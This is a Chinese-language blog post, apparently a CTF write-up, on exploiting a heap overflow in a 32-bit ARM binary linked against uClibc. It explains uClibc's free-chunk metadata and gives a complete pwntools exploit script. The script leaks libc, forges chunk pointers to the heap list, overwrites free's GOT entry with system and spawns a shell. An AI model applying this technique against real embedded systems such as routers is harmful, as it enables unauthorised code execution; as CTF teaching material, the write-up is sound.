

<!DOCTYPE html>
<html lang="">
<head>
  


<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>arm构架uclibc下的堆溢出初识 [ An9Ela ]</title>

  <link rel="icon" href="/img/favicon.ico">


    <meta name="author" content="An9Ela">





  <link rel="alternate" href="/atom.xml " title="An9Ela" type="application/atom+xml">


  
    <link rel="stylesheet" href="/css/main.css">
  

<meta name="generator" content="Hexo 6.2.0"></head>
  <body data-theme="light" class="notransition">
    <script>
      const body = document.body;
      const data = body.getAttribute("data-theme");
      const initTheme = (state) => {
        if (state === "dark") {
          body.setAttribute("data-theme", "dark");
        } else if (state === "light") {
          body.removeAttribute("data-theme");
        } else {
          localStorage.setItem("theme", data);
        }
      };
   
      initTheme(localStorage.getItem("theme"));
      
      setTimeout(() => body.classList.remove("notransition"), 75);
    </script>
  <div class="navbar" role="navigation">
    <nav class="menu">
      <input type="checkbox" id="menu-trigger" class="menu-trigger" />
      <label for="menu-trigger">
        <span class="menu-icon">
          <svg
            xmlns="http://www.w3.org/2000/svg"
            width="24"
            height="24"
            viewBox="0 0 512 512"
          >
            <path
              d="M64,384H448V341.33H64Zm0-106.67H448V234.67H64ZM64,128v42.67H448V128Z"
            />
          </svg>
        </span>
      </label>
      <a id="mode">
        <svg
          class="mode-sunny"
          xmlns="http://www.w3.org/2000/svg"
          width="24"
          height="24"
          viewBox="0 0 512 512"
        >
          <title>LIGHT</title>
          <line
            x1="256"
            y1="48"
            x2="256"
            y2="96"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="256"
            y1="416"
            x2="256"
            y2="464"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="108.92"
            x2="369.14"
            y2="142.86"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="369.14"
            x2="108.92"
            y2="403.08"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="464"
            y1="256"
            x2="416"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="96"
            y1="256"
            x2="48"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="403.08"
            x2="369.14"
            y2="369.14"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="142.86"
            x2="108.92"
            y2="108.92"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <circle
            cx="256"
            cy="256"
            r="80"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
        </svg>
        <svg
          class="mode-moon"
          xmlns="http://www.w3.org/2000/svg"
          width="24"
          height="24"
          viewBox="0 0 512 512"
        >
          <title>DARK</title>
          <line
            x1="256"
            y1="48"
            x2="256"
            y2="96"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="256"
            y1="416"
            x2="256"
            y2="464"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="108.92"
            x2="369.14"
            y2="142.86"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="369.14"
            x2="108.92"
            y2="403.08"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="464"
            y1="256"
            x2="416"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="96"
            y1="256"
            x2="48"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="403.08"
            x2="369.14"
            y2="369.14"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="142.86"
            x2="108.92"
            y2="108.92"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <circle
            cx="256"
            cy="256"
            r="80"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
        </svg>
      </a>
      <div class="trigger">
        <div class="trigger-container">
          
            
            
            
            
            
            
            <a class="menu-link " href="/"> Home</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/about/"> About</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/archives/"> Archives</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/tags/"> Tags</a>
          
        </div>
      </div>
    </nav>
  </div>
  
<div class="wrapper post">
  <main class="page-content" aria-label="Content">
      <header class="header">
        
          <div class="tags">
            <a href="/tags/ARM-PWN/" class="tag"># ARM_PWN</a>
          </div>
        
        <h1 class="header-title" itemprop="headline">arm构架uclibc下的堆溢出初识</h1>
          <div class="post-meta">
            <time>Jul 01, 2020</time>
            <span itemprop="author">
              <span itemprop="name">An9Ela</span>
            </span>
          </div>
        </header>

          <div class="page-content"><h5 id="arm构架uclibc下的堆溢出初识"><a href="#arm构架uclibc下的堆溢出初识" class="headerlink" title="arm构架uclibc下的堆溢出初识"></a>arm构架<code>uclibc</code>下的堆溢出初识</h5><p>第五空间2020遇到的一道arm构架的题目。</p>
<span id="more"></span>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">angela@angela-dev:/mnt/hgfs/share/pwn/5space/pwnme/lib$ file a.out</span><br><span class="line">a.out: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped</span><br></pre></td></tr></table></figure>

<p>可以看到是32位ARM动态链接的可执行文件，运行方式如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qemu-arm -L ./lib ./a.out // ./lib为动态链接库的路径</span><br></pre></td></tr></table></figure>

<p>首先介绍<code>uclibc</code>，是 <code>glibc</code> 的一个精简版，主要用于嵌入式设备，比如路由器就基本使用的是 <code>uClibc</code>， 简单自然效率高。所以他和一般的<code>x86</code>的堆分配机制会有些不一样。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">struct heap_free_area</span><br><span class="line">&#123;</span><br><span class="line">	size_t size;  //空闲区的大小</span><br><span class="line">	 //用于构造循环链表</span><br><span class="line">	struct heap_free_area *next, *prev;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">size 表示该空闲区域的大小，这个空闲区域的实际地址并没有用指针详细地指明，</span><br><span class="line">因为它就位于当前 heap_free_area 节点的前面，如下图所示：</span><br><span class="line"></span><br><span class="line">+-------------------------------+--------------------+</span><br><span class="line">|                               |   heap_free_area   |</span><br><span class="line">+-------------------------------+--------------------+</span><br><span class="line">\___________ 空闲空间 ___________/\___ 空闲空间信息 ___/</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">实际可用的空闲空间大小为 size – sizeof(struct heap_free_area)</span><br><span class="line"></span><br><span class="line">指针 next, prev 分别指向下一个和上一个空间区域，</span><br><span class="line">所有的空闲区域就是通过许许多多这样的节点链起来的，</span><br><span class="line">很显然，这样组成的是一个双向链表。</span><br></pre></td></tr></table></figure>

<p>所以 <code>free</code> 块在内存中的存储方式和 <code>glibc</code> 中的存储方式是不一样的。它的元数据在块的末尾，而 <code>glibc</code>中元数据在 块的开头。</p>
<p>所以如果我们有一个堆溢出，我们就需要覆盖到下面空闲空间的 <code>heap_free_area</code> 中的 指针，才能实现 <code>uClibc</code>中的 <code>unlink</code> 攻击</p>
<p>详细介绍uclibc的博客：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/hac425/p/9416738.html">https://www.cnblogs.com/hac425/p/9416738.html</a></p>
<p>而本题中由于edit函数存在堆溢出漏洞，于是我们可以首先构造<code>overlop</code>泄露<code>libc</code>之后利用堆溢出覆盖 <code>heap_free_area</code> 中的 指针为<code>heaplist</code>造成<code>unlink</code>最后利用edit函数覆盖free的got为system</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">DEBUG=<span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> DEBUG:</span><br><span class="line">	p=process([<span class="string">&quot;qemu-arm&quot;</span>,<span class="string">&quot;-L&quot;</span>,<span class="string">&quot;./lib&quot;</span>,<span class="string">&quot;./a.out&quot;</span>])</span><br><span class="line"><span class="comment">#qemu-arm -L ./lib ./a.out</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	<span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>():</span><br><span class="line">     	p.sendlineafter(<span class="string">&quot;&gt;&gt;&gt; &quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">l,note</span>):</span><br><span class="line">     	p.sendlineafter(<span class="string">&quot;&gt;&gt;&gt; &quot;</span>,<span class="string">&quot;2&quot;</span>)</span><br><span class="line">     	p.sendlineafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(l))</span><br><span class="line">     	p.sendafter(<span class="string">&quot;:&quot;</span>,note)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">change</span>(<span class="params">index,l,note</span>):</span><br><span class="line">     	p.sendlineafter(<span class="string">&quot;&gt;&gt;&gt; &quot;</span>,<span class="string">&quot;3&quot;</span>)</span><br><span class="line">     	p.sendlineafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(index))</span><br><span class="line">     	p.sendlineafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(l))</span><br><span class="line">     	p.sendafter(<span class="string">&quot;:&quot;</span>,note)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">remove</span>(<span class="params">index</span>):</span><br><span class="line">     	p.sendlineafter(<span class="string">&quot;&gt;&gt;&gt; &quot;</span>,<span class="string">&quot;4&quot;</span>)</span><br><span class="line">     	p.sendlineafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x18</span>,<span class="string">&quot;aaaaaaaa&quot;</span>)  <span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x4f8</span>,<span class="string">&quot;aaaaaaaa&quot;</span>) <span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x18</span>,<span class="string">&quot;aaaaaaaa&quot;</span>)  <span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x18</span>,<span class="string">&quot;aaaaaaaa&quot;</span>)  <span class="comment">#3</span></span><br><span class="line">change(<span class="number">0</span>,<span class="number">0x40</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x1c</span>+p64(<span class="number">0x500</span>+<span class="number">0x20</span>+<span class="number">1</span>))  <span class="comment">#利用堆溢出构造overlop即使2号堆块uaf</span></span><br><span class="line">remove(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">0x4f8</span>,<span class="string">&quot;aaaaaaaa&quot;</span>)  <span class="comment">#2号堆块中存在指向main_arean+88的地址</span></span><br><span class="line">show()</span><br><span class="line">p.recvuntil(<span class="string">&quot;2 : &quot;</span>)</span><br><span class="line">libc=u32(p.recv(<span class="number">4</span>))+<span class="number">0xff720000</span>-<span class="number">0xff7ba8ec</span></span><br><span class="line">success(<span class="string">&#x27;libc: &#x27;</span>+<span class="built_in">hex</span>(libc))</span><br><span class="line">add(<span class="number">0x18</span>,<span class="string">&#x27;aaaaaaaa&#x27;</span>)  <span class="comment">#4  4号和2号指向同一堆块</span></span><br><span class="line">add(<span class="number">0x21</span>,<span class="string">&quot;aaaaaaa&quot;</span>)   <span class="comment">#5</span></span><br><span class="line">remove(<span class="number">0</span>)</span><br><span class="line">remove(<span class="number">4</span>)</span><br><span class="line">change(<span class="number">2</span>,<span class="number">8</span>,p32(<span class="number">0x21048</span>^<span class="number">0x22</span>))  <span class="comment">#使等下申请回来的4号堆块指向heaplist</span></span><br><span class="line">add(<span class="number">0x18</span>,<span class="string">&quot;aaaaa&quot;</span>) <span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x18</span>,<span class="string">&#x27;aaaaa&#x27;</span>) <span class="comment">#4</span></span><br><span class="line">change(<span class="number">4</span>,<span class="number">0xf8</span>,<span class="string">&quot;/bin/sh\x00&quot;</span>+p32(<span class="number">0</span>)*<span class="number">4</span>+p32(<span class="number">0x28</span>)+p32(<span class="number">0x21038</span>)) <span class="comment">#使0号堆ptr为free_got(0x21038)</span></span><br><span class="line">change(<span class="number">0</span>,<span class="number">0x8</span>,p32(libc+<span class="number">0x51800</span>))  <span class="comment">#覆盖got</span></span><br><span class="line"><span class="comment">#show()</span></span><br><span class="line">remove(<span class="number">4</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
</div>
          <nav class="post-nav">
    
    <a class="post-nav-item post-nav-prev" href="/2020/07/07/SCTF2020/">
      <div class="nav-arrow">&lt;&nbsp;NEWER</div>
      <span class="post-title">SCTF2020</span>
    </a>
    
    
    <a class="post-nav-item post-nav-next" href="/2019/04/06/python-en-de-code/">
      <div class="nav-arrow">OLDER&nbsp;&gt;</div>
      <span class="post-title">python en(de)code</span>
    </a>
    
  </nav>

   </main>
</div>

  <footer class="footer">
    <small class="footer_copyright">
      <div id="bottom-inner">
        © 2021 Site by An9Ela using
        <a target="_blank" rel="noopener" href="http://hexo.io">hexo blog framework</a>.
        <br>
        <p> Theme is <a href="https://github.com/dewjohn/hexo-theme-klise">Klise</a></p>
      </div>
    </small>
  </footer>
  
  

    
      <script src="/js/main.js"></script>
    
  
  <script>
    window.FPConfig = {
      delay: 0,
      ignoreKeywords: [],
      maxRPS: 3,
      hoverDelay: 50,
    };
  </script>
  <script defer src="https://cdn.jsdelivr.net/gh/gijo-varghese/flying-pages@2.1.2/flying-pages.min.js"></script>
</body>
</html>
